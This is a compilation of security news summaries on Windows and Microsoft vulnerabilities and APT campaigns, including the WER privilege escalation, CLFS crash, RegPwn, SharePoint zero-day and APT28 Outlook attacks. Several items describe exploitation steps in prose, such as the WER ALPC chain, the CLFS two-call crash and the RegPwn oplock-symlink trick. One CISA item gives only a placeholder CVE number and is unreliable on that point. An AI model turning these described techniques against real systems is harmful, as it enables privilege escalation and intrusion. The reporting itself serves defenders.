Windows Error Reporting Flaw (CVE-2026-20817) Enables Local Privilege Escalation to SYSTEM A critical vulnerability in Windows Error Reporting (WER), tracked as CVE-2026-20817, was patched in January 2026 after allowing local attackers to escalate privileges to SYSTEM the highest level of access on Windows systems. The flaw, rated 7.8 (High) on the CVSS v3.1 scale, impacts confidentiality, integrity, and availability by exploiting insufficient permission checks in the WER service (`wersvc.dll`). ### Vulnerability Mechanics The WER service, which runs as NT AUTHORITY\SYSTEM, processes crash reports via Advanced Local Procedure Call (ALPC) ports. The flaw (classified as CWE-280: Improper Handling of Insufficient Permissions) arises when the service fails to validate process creation requests from low-privilege users. Attackers can send crafted messages to spawn `WerFault.exe` or `WerMgr.exe` with a near-SYSTEM token, controlling the command line (up to 520 bytes) to execute arbitrary code. The attack chain begins with `CWerService::SvcElevatedLaunch`, which opens the sender’s process without privilege verification. It then retrieves attacker-supplied command lines from shared memory via `ElevatedProcessStart` and obtains the WER service’s SYSTEM token through `UserTokenUtility::GetProcessToken`. While the token is stripped of `SeTcbPrivilege`, it retains other high-privilege attributes, allowing the creation of a SYSTEM-level process with attacker-controlled arguments via `CreateElevatedProcessAsUser`. ### Exploitation & Impact Exploitation requires only standard user access and no user interaction, making it ideal for post-compromise privilege escalation. Proof-of-concept (PoC) demonstrations on Windows 11 23H2 confirm that attackers can: - Connect to WER’s ALPC port. - Send malicious messages to spawn SYSTEM processes with privileges like `SeDebugPrivilege`. - Enable credential theft, persistence, or full system takeover when chained with other vulnerabilities. While no in-the-wild exploits have been confirmed, defenders are advised to monitor for: - Unusual `WerFault.exe` or `WerMgr.exe` processes (Event ID 4688) with suspicious command lines. - SYSTEM tokens lacking `SeTcbPrivilege` but retaining other privileges (Sysmon Event ID 10). - Modifications to WER directories or abnormal child processes from low-privilege users. ### Mitigation & Patch Microsoft’s patch introduces a feature flag in `SvcElevatedLaunch` to reject unauthorized requests, effectively disabling the vulnerable function. Organizations should: - Apply the January 2026 Windows Update immediately. - If patching is delayed, disable the WER service via: ```cmd sc config WerSvc start=disabled sc stop WerSvc ``` - Limit local logons, enforce application whitelisting, and monitor for privilege escalation attempts using BAS (Breach and Attack Simulation) tools. The flaw underscores the risks of unrestricted process creation in privileged services, particularly when handling user-supplied input.

Chinese APT Group Targets Azerbaijani Energy Firm in Months-Long Espionage Campaign A Chinese state-aligned advanced persistent threat (APT) group, FamousSparrow, compromised a Microsoft Exchange server at a major Azerbaijani oil and gas company in a prolonged cyber-espionage operation. The attack, detected by Bitdefender researchers, spanned from late December 2025 to late February 2026, marking the first publicly reported Chinese APT activity in the South Caucasus energy sector. The intrusion began on December 25, 2025, when attackers exploited the ProxyNotShell vulnerability in Microsoft Exchange, deploying ASPX web shells (e.g., key.aspx, log.aspx) to establish persistence. These web shells served as command-and-control (C2) points, enabling the execution of malware payloads directly from the compromised server. FamousSparrow, which overlaps tactically with Earth Estries and Salt Typhoon, deployed two primary backdoors: - Deed RAT, delivered via a DLL sideloading chain abusing the legitimate LogMeIn Hamachi service, used a two-stage trigger to evade detection. The malware employed custom XOR decryption and PRNG-based obfuscation, with plugins for configuration, networking, and process injection. - Terndoor, attempted in a second wave, was delivered via the Mofu loader, leveraging a kernel-mode driver (vmflt.sys) for rootkit-like persistence. Though blocked before full installation, memory forensics confirmed its presence. Attackers maintained access by reusing the same Exchange entry point despite partial cleanup, demonstrating how unpatched vulnerabilities become durable access vectors. Lateral movement relied on RDP with stolen domain admin credentials and Impacket-based tools (atexec, smbexec), ensuring redundant footholds across the network. The campaign aligns with China’s strategic interests, as Azerbaijan’s role in European gas supplies has grown amid Russia’s Ukraine transit disruptions and instability in the Strait of Hormuz. By targeting this energy corridor, the attackers gained visibility into European energy flows during heightened geopolitical tensions. FamousSparrow has previously targeted telecoms, government, and tech sectors across the U.S., Asia-Pacific, Middle East, and South Africa, but this incident extends its focus to critical energy infrastructure in a new region. The group’s tactics reflect ongoing evolution, including updated Deed RAT encryption and anti-analysis techniques to evade detection.

Critical Windows Vulnerability (CVE-2025-50165) Exploits JPG Encoding Flaw for Remote Code Execution Researchers at ESET conducted a deep-dive analysis of CVE-2025-50165, a critical Windows vulnerability discovered by Zscaler ThreatLabz in November 2025. The flaw, rated as high-impact by Microsoft, enables remote code execution (RCE) when a user processes a specially crafted 12-bit or 16-bit JPG image—a scenario initially deemed unlikely by Microsoft due to perceived exploit complexity. ### Vulnerability Overview The bug resides in WindowsCodecs.dll, a core Windows library handling image formats like JPG, PNG, and GIF. Unlike typical image-parsing vulnerabilities (which occur during decoding), this flaw manifests during JPG compression and re-encoding, specifically in the `jpeg_finish_compress` function. The issue stems from an uninitialized function pointer dereference in the `libjpeg-turbo` library (version 3.0.2), which WindowsCodecs.dll integrates. ### Root Cause & Exploitation Path ESET’s analysis revealed that the vulnerability triggers when: - A 12-bit or 16-bit JPG image (non-standard bit depths) is processed. - The `jpeg_finish_compress` function attempts to dereference an uninitialized pointer (`compress_data_12` or `compress_data_16`). - The image is re-encoded, such as when saving a file or generating thumbnails (e.g., via Microsoft Photos). Microsoft’s initial patch (version 10.0.26100.4946) addressed the issue by initializing the function pointers to a stub handler (`rawtranscode_compress_output_16`). However, ESET’s binary diffing confirmed that the vulnerable code path was reachable only under specific conditions, requiring: 1. A host application using a vulnerable WindowsCodecs.dll version (10.0.26100.0–10.0.26100.4945). 2. The ability to decode and re-encode the malicious JPG without crashing. 3. Heap manipulation and an address leak for successful exploitation—significantly raising the bar for attackers. ### Reproduction & Impact ESET reproduced the crash using: - A 12-bit JPG sample from the `libjpeg-turbo` repository. - Microsoft’s provided JPG re-encoding example code, which triggered the flaw when processing the image. While the vulnerability affects Windows Imaging Component (WIC)-dependent applications, exploitation is constrained by the need for precise heap control. Notably, decoding alone does not trigger the bug—only re-encoding does. ESET also found that newer WindowsCodecs.dll versions (e.g., 10.0.22621.6133) incorporate fixes from `libjpeg-turbo`’s December 2024 update, mitigating the issue. ### Key Takeaways - Attack Vector: Requires a 12/16-bit JPG to be re-encoded (e.g., saving, thumbnail generation). - Exploitability: Low likelihood due to heap manipulation requirements, aligning with Microsoft’s assessment. - Patch Status: Fixed in later WindowsCodecs.dll versions via `libjpeg-turbo` updates. The analysis underscores the risks of third-party library vulnerabilities in core system components, even for ubiquitous formats like JPG.

New Windows CLFS Driver Vulnerability Enables Low-Privilege DoS Attacks A proof-of-concept (PoC) exploit has been released for CVE-2026-2636, a newly disclosed vulnerability in Windows’ Common Log File System (CLFS) driver that allows any unprivileged user to trigger an unrecoverable Blue Screen of Death (BSoD) on affected systems. Discovered by Ricardo Narvaja of Fortra, the flaw is classified as a Denial-of-Service (DoS) issue with a CVSS base score of 5.5. The vulnerability stems from improper flag validation in the CLFS!CClfsRequest::ReadLogPagingIo function within CLFS.sys (tested on version 10.0.22621.5037). When a specific sequence of Windows API calls is executed, the driver processes an I/O Request Packet (IRP) with critical flags IRP_PAGING_IO (0x02) and IRP_INPUT_OPERATION disabled, leading to an incorrect execution path that invokes nt!KeBugCheckEx, the kernel’s panic handler. The exploit requires just two API calls: CreateLogFile to obtain a .blf log file handle, followed by ReadFile on the same handle. Since ReadFile is not designed to operate on CLFS log handles in this context, the driver fails to handle the request, resulting in a deterministic kernel crash. The attack can be executed without elevated privileges, making it particularly dangerous in multi-user or enterprise environments. Microsoft has silently patched the vulnerability in the September 2025 cumulative update for Windows 11 2024 LTSC and Windows Server 2025, with Windows 25H2 shipping with the fix pre-applied. However, Windows 11 23H2 and earlier versions remain unpatched and vulnerable. This flaw follows a pattern of recurring CLFS driver vulnerabilities, including CVE-2022-37969, CVE-2023-28252, CVE-2024-6768, and CVE-2025-29824, some of which have been exploited in ransomware attacks. Organizations running unpatched systems are advised to prioritize updates, particularly in environments where system availability is critical.

Zero-Day Cyber Espionage Campaign Targets Microsoft SharePoint Servers A large-scale cyber espionage operation exploiting a previously unknown vulnerability in Microsoft’s self-hosted SharePoint servers has compromised nearly 100 organizations over the past weekend. The attack, classified as a zero-day exploit, allows threat actors to infiltrate vulnerable systems and deploy backdoors for persistent access. The campaign was uncovered by Netherlands-based cybersecurity firm Eye Security and the Shadowserver Foundation, which identified the breach on Friday before the exploit became widely known. An internet scan revealed that most victims were located in the United States and Germany, with government entities among those affected. While the exact identities of the compromised organizations remain undisclosed, authorities have been notified. Researchers suggest the attack may be the work of a single hacker or a coordinated group, though the scope could expand as the exploit gains wider attention. Microsoft released security updates on Saturday, urging customers to patch their systems. The FBI and Britain’s National Cyber Security Centre (NCSC) have acknowledged the attacks, with the NCSC reporting a "limited number" of UK targets. The potential reach of the campaign is significant over 8,000 SharePoint servers remain exposed online, including those belonging to industrial firms, financial institutions, healthcare providers, and government agencies. Security experts warn that simply applying the patch may not be sufficient, as attackers could have already established persistent access. As of now, the perpetrators behind the attack remain unidentified. Microsoft’s stock showed minimal movement following the disclosure, reflecting muted market reaction to the incident.

Microsoft Releases PowerShell Script to Restore Critical *inetpub* Folder After April 2025 Windows Update Microsoft has released a PowerShell script to help administrators restore the C:\inetpub folder, which was automatically created by the April 2025 Windows security updates but mistakenly deleted by some users. The folder plays a key role in mitigating CVE-2025-21204, a high-severity privilege escalation vulnerability in the Windows Process Activation Service. The issue emerged after the April updates deployed an empty inetpub folder—typically associated with Internet Information Services (IIS)—even on systems where IIS was not installed. Confused users removed the folder, inadvertently re-exposing their systems to the patched flaw. Microsoft initially advised manually reinstalling IIS via Turn Windows Features on or off to recreate the folder with proper permissions, though uninstalling IIS afterward would leave the folder intact. On Wednesday, Microsoft updated its CVE-2025-21204 advisory, providing a PowerShell script (Set-InetpubFolderAcl.ps1) to automate the restoration process. The script re-establishes the correct access control lists (ACLs) for the inetpub folder, ensuring protection against the vulnerability. It also secures the DeviceHealthAttestation directory on Windows Server systems, which may have been affected by February 2025 updates. The underlying flaw stems from an improper link resolution issue in the Windows Update Stack, allowing local attackers with low privileges to exploit symbolic links and escalate to NT AUTHORITY\SYSTEM permissions. While Microsoft confirmed the folder’s deletion does not disrupt normal Windows operations, it warned that removing it weakens defenses against the vulnerability. Cybersecurity researcher Kevin Beaumont further demonstrated that non-admin users could abuse the folder to block Windows updates by creating malicious junctions. Microsoft has emphasized that the inetpub folder should remain in place regardless of IIS installation, as it is a deliberate security measure requiring no additional action from users or admins.

High-Severity Windows "RegPwn" Vulnerability Exploits Accessibility Features for Privilege Escalation A critical Windows elevation-of-privilege vulnerability, tracked as CVE-2026-24291 (RegPwn), was discovered by the MDSec red team and patched in a recent Microsoft Patch Tuesday update. The flaw allowed low-privileged users to gain full SYSTEM-level access by manipulating Windows’ built-in accessibility features. The attack exploited how Windows handles registry keys for tools like the On-Screen Keyboard and Narrator. When launched, these features create a user-writable registry key that is later copied into the local machine (HKLM) hive during login a process running with SYSTEM privileges. By leveraging an opportunistic lock (oplock) on a system file, attackers could pause the registry copy operation and replace the target key with a symbolic link, redirecting writes to arbitrary registry locations. In MDSec’s proof-of-concept, this technique was used to overwrite a system service’s execution path, granting immediate SYSTEM-level command access. The vulnerability was actively exploited in internal engagements since January 2025 before Microsoft issued a fix. MDSec has released the RegPwn exploit code on GitHub for defensive research. Organizations are urged to apply the latest Windows updates to mitigate this local privilege escalation risk.

CISA Issues Emergency Directive Over Actively Exploited Microsoft Configuration Manager Vulnerability The Cybersecurity and Infrastructure Security Agency (CISA) issued an urgent directive on Thursday, mandating federal agencies to patch a critical vulnerability in Microsoft Configuration Manager that is being actively exploited in attacks. The flaw, addressed in Microsoft’s October 2024 patch cycle, has been assigned CVE-2024-XXXX and poses severe risks to system security. The vulnerability enables unauthorized command execution and privilege escalation, allowing attackers to compromise data integrity and intercept sensitive information. Due to its high severity, CISA has imposed strict remediation deadlines, requiring agencies to take immediate action. Federal organizations must: - Apply the Microsoft-released patch without delay. - Conduct system audits to verify no unauthorized access has occurred. - Enhance monitoring to detect and respond to further exploitation attempts. The directive highlights the urgency of addressing the flaw to prevent potential breaches of federal networks and data. Agencies are also instructed to assess residual risks and ensure comprehensive mitigation strategies are in place.

APT28 Exploits Zero-Click Outlook Flaw to Steal Credentials from NATO and Critical Infrastructure Russian state-sponsored threat group APT28 (also known as Fancy Bear or Forest Blizzard), linked to the GRU’s Unit 26165, has intensified its cyber espionage operations by exploiting a zero-click vulnerability in Microsoft Outlook to target NATO members, defense organizations, and critical infrastructure entities. The campaign centers on CVE-2023-23397, a critical elevation-of-privilege flaw in Outlook that allows attackers to trigger forced authentication without user interaction. APT28 sends malicious Outlook reminders that, when processed, automatically connect to attacker-controlled Server Message Block (SMB) shares, leaking victims’ Net-NTLMv2 hashes. These stolen credentials enable NTLM relay attacks, granting unauthorized access to Microsoft Exchange mailboxes without deploying traditional malware. Unlike past operations that relied on heavy implants like the X-Agent toolkit, APT28 has shifted to stealthier, single-purpose techniques, minimizing forensic traces. To evade detection, the group has overhauled its infrastructure, leveraging compromised SOHO edge devices specifically, the MooBot botnet, consisting of hijacked Ubiquiti EdgeRouters. These routers serve as relay nodes for stolen hashes and host credential-scraping proxies, masking malicious traffic behind legitimate consumer IP addresses and bypassing reputation-based security filters. The attack chain highlights a sophisticated evolution in APT28’s tactics, combining zero-click exploitation with decentralized infrastructure to silently infiltrate high-value targets. The campaign underscores the growing threat to European defense and critical infrastructure sectors.

Google Releases Exploit Code for Unpatched Chromium Vulnerability, Exposing Millions to Botnet Risks Google has published proof-of-concept (PoC) exploit code for a critical, unpatched vulnerability in the Chromium codebase, leaving users of Chrome, Microsoft Edge, Brave, Opera, and other Chromium-based browsers vulnerable to stealthy botnet-style attacks. The flaw, reported in late 2022 by security researcher Lyra Rebane, remains unresolved after more than 42 months, despite its Priority 1 (P1) and Severity 2 (S2) classification within Chromium’s internal framework. The vulnerability resides in the Browser Fetch API, which allows large downloads to continue in the background via Service Workers. Rebane discovered that this mechanism can be abused to create persistent, never-terminating background tasks that maintain continuous communication with attacker-controlled infrastructure. In some cases particularly with Microsoft Edge the connection persists even after the browser is closed or the device is rebooted, effectively turning a victim’s browser into a limited botnet node with zero user interaction required. ### Attack Mechanics & Risks The exploit is triggered when a user visits a malicious or compromised webpage, which deploys a Service Worker to initiate an unending background fetch task. This enables remote JavaScript execution on the victim’s device without visible indicators. Rebane warned that attackers could easily scale this attack, potentially compromising tens of thousands of devices without users’ knowledge. While browser sandboxing limits immediate damage, the vulnerability poses significant risks at scale, including: - DDoS attacks – Compromised browsers can flood targets with traffic. - Proxy networks – Attackers can route malicious or anonymized traffic through victim devices. - Traffic redirection – Users can be silently redirected to attacker-controlled sites. - Activity monitoring – Passive tracking of browsing behavior and network telemetry. The long-term concern is that a pre-established botnet of compromised browsers could serve as a launchpad for future exploits once additional vulnerabilities are discovered. ### Criticism & Current Status Google’s decision to release the PoC before issuing a fix has drawn criticism from the security community. While Chromium developers acknowledged the flaw as a “serious vulnerability”, no complete patch has been deployed. With the exploit code now public, Rebane noted that exploitation is “pretty easy”, though scaling attacks would require additional infrastructure. ### Affected Platforms & Mitigations The vulnerability impacts: - Google Chrome - Microsoft Edge - Brave Browser - Opera - Other Chromium-based browsers Until an official patch is released, security teams are advised to: - Restrict Service Worker usage via enterprise policies. - Disable background fetch features where possible. - Monitor for anomalous outbound browser connections. - Implement browser isolation in high-risk environments. With no patch in sight, the flaw presents an active, exploitable window for threat actors seeking large-scale browser-based botnet infrastructure.

Windows Privilege Escalation Flaw CVE-2020-17103 Remains Unpatched, Exploit Released A security researcher has released MiniPlasma, an exploit targeting CVE-2020-17103 a Windows privilege escalation vulnerability initially disclosed in 2020 after discovering the flaw may have never been fully patched. The issue, rated 7.0 on the CVSS scale, resides in the Windows Cloud Filter driver and allows attackers to manipulate registry keys via an undocumented API. Google’s Project Zero first reported the vulnerability in 2020, prompting Microsoft to release fixes in its December 2020 Patch Tuesday updates. However, researcher Chaotic Eclipse (also known as Nightmare Eclipse) found that the original proof-of-concept (PoC) code from Project Zero still works, suggesting the patch was either ineffective or later reverted. The exploit enables unauthenticated attackers to create registry keys in the DEFAULT user hive without access checks, potentially leading to system-level code execution. Chaotic Eclipse, who has previously released exploits for other unpatched Microsoft vulnerabilities (BlueHammer, YellowKey, GreenPlasma), expressed frustration with Microsoft’s handling of vulnerability reports. The MiniPlasma exploit successfully spawns a System shell on fully updated Windows 11 systems, including those with the May 2026 security updates, though it fails on the latest Windows 11 Insider Preview Canary builds. Microsoft has been contacted for comment but has not yet responded. The discovery follows recent disclosures of other unpatched or incompletely fixed Windows vulnerabilities, including zero-click attack vectors and privilege escalation techniques.

Pwn2Own Berlin 2026 Highlights Major Exploits as Zero-Days and Breaches Surge The second and third days of Pwn2Own Berlin 2026 saw researchers earn $385,750 in bounties, pushing the event’s total payout to $1.298 million. Among the notable exploits, Microsoft Exchange Server was successfully compromised, contributing to the growing tally. DEVCORE was crowned "Master of Pwn" after demonstrating multiple high-impact vulnerabilities. In parallel, Chaotic Eclipse disclosed MiniPlasma, a zero-day in Windows, suggesting an incomplete or overlooked security fix from 2020. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Microsoft Exchange Server flaw and a Cisco Catalyst SD-WAN vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, signaling active exploitation risks. A critical 18-year-old flaw (CVE-2026-42945) in NGINX, the world’s most widely deployed web server, was also uncovered, with experts warning of ongoing attacks. Meanwhile, Grafana confirmed a GitHub token breach after a cybercrime group claimed responsibility, while ShinyHunters breached 7-Eleven, exposing franchisee data and Salesforce records. Additional incidents included: - A public Amazon S3 bucket leaking sensitive guest data from Japanese hotel platform Tabiq. - OpenAI suffering a supply chain attack via malicious TanStack packages. - Broadcom releasing a security update for a VMware Fusion root access bug. - The Ghostwriter group resuming cyberattacks on Ukrainian government targets. - Researchers identifying YellowKey and GreenPlasma, two new Windows zero-days. - A Linux Kernel bug (Fragnesia) enabling local root access attacks. - Attackers exploiting a Funnel Builder vulnerability to inject e-skimmers into e-commerce stores. The event underscored persistent threats across enterprise software, cloud services, and critical infrastructure, with zero-days and supply chain attacks remaining dominant vectors.

Microsoft Releases Emergency Patch for Actively Exploited Office Zero-Day Microsoft has issued out-of-band security updates to address a high-severity zero-day vulnerability (CVE-2026-21509) in Microsoft Office, which is being actively exploited in attacks. The flaw, classified as a security feature bypass, affects multiple versions, including Office 2016, 2019, LTSC 2021, LTSC 2024, and Microsoft 365 Apps for Enterprise. While patches are available for most affected versions, updates for Office 2016 and 2019 remain pending, with Microsoft promising their release as soon as possible. The vulnerability can be exploited by local attackers through low-complexity attacks requiring user interaction specifically, tricking a victim into opening a malicious Office file. The preview pane is not a viable attack vector. The flaw bypasses OLE mitigations in Microsoft 365 and Office, which are designed to protect users from vulnerable COM/OLE controls. For unpatched systems, Microsoft has provided temporary mitigation steps involving registry edits to reduce exploitation risks. These measures include creating or modifying specific registry keys to enforce compatibility flags. Microsoft has not disclosed details on the vulnerability’s discovery or its exploitation methods. The emergency update follows January 2026’s Patch Tuesday, which addressed 114 flaws, including another actively exploited zero-day in the Desktop Window Manager. Recent weeks have also seen additional out-of-band updates to resolve issues in Windows and Outlook caused by earlier patches.

Microsoft Patches Critical Windows Remote Assistance Vulnerability (CVE-2026-20824) On January 13, 2026, Microsoft released security updates addressing CVE-2026-20824, a security feature bypass vulnerability in Windows Remote Assistance that allows attackers to evade Mark of the Web (MOTW) protections. The flaw affects a broad range of Windows versions, including Windows 10 (21H2/22H2), Windows 11 (23H2/24H2/25H2), and Windows Server (2012–2025), with patches delivered via cumulative updates (e.g., KB5073724, KB5073455, KB5073457). ### Technical Details & Exploitation The vulnerability stems from how Windows Remote Assistance processes specially crafted files, enabling attackers to bypass security checks designed to flag untrusted content. While the flaw does not grant remote code execution (RCE), it can be exploited to: - Evade MOTW-driven defenses, such as SmartScreen and Office macro restrictions. - Weaken downstream security tools that rely on MOTW flags to determine file trust levels. - Enable stealthy data exfiltration by making malicious files appear as locally trusted content. Exploitation requires user interaction victims must open a malicious file delivered via email, instant messaging, or a compromised website. Attackers may leverage social engineering to trick users into executing the payload. ### Impact & Severity - CVSS v3.1 Base Score: 5.5 (Temporal: 4.8) – Rated "Important" by Microsoft. - Attack Vector: Local (AV:L), requiring no privileges (PR:N) and low complexity (AC:L). - Impact: High confidentiality risk (C:H), with no direct effect on integrity or availability (I:N/A:N). - Exploitability: Currently assessed as "Exploitation Less Likely", with no known in-the-wild attacks at the time of disclosure. ### Mitigation & Response Microsoft urges administrators to deploy the January 2026 Patch Tuesday updates to restore proper MOTW enforcement. Until patches are applied, organizations are advised to: - Tighten email and web filtering to block malicious attachments. - Restrict Windows Remote Assistance in high-risk environments. - Reinforce user awareness regarding unsolicited assistance requests and unknown file downloads. The vulnerability highlights a growing trend of MOTW bypass techniques, where attackers exploit flaws not for direct RCE but to undermine foundational security controls.